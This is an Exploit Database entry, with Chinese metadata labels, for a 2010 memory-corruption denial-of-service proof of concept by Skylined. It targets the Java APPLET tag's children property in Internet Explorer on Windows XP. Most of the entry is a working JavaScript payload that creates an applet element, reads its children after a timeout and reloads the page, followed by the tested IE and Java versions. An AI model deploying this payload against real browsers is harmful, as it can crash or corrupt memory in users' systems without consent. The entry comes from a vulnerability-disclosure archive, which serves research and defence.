Oracle Java – APPLET Tag Children Property Memory Corruption

• Exploit Database
• 33 阅读

• 作者： Skylined
  日期： 2010-10-13
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15243/

• Source: http://skypher.com/index.php/2010/10/13/issue-18-oracle-java-applet-childre/
  
  <SCRIPT>
  o=document.createElement("applet");
  setTimeout(function () {
  x=o.children;
  location.reload();
  }, 1);
  </SCRIPT>
  
  Tested with:
  Windows XP sp3 (5.1.2600)
  MSIE 7.0.5730.13
  MSIE 8.0.6001.18702
  Sun Java Version 6 Update 20 1.6.0_20-b02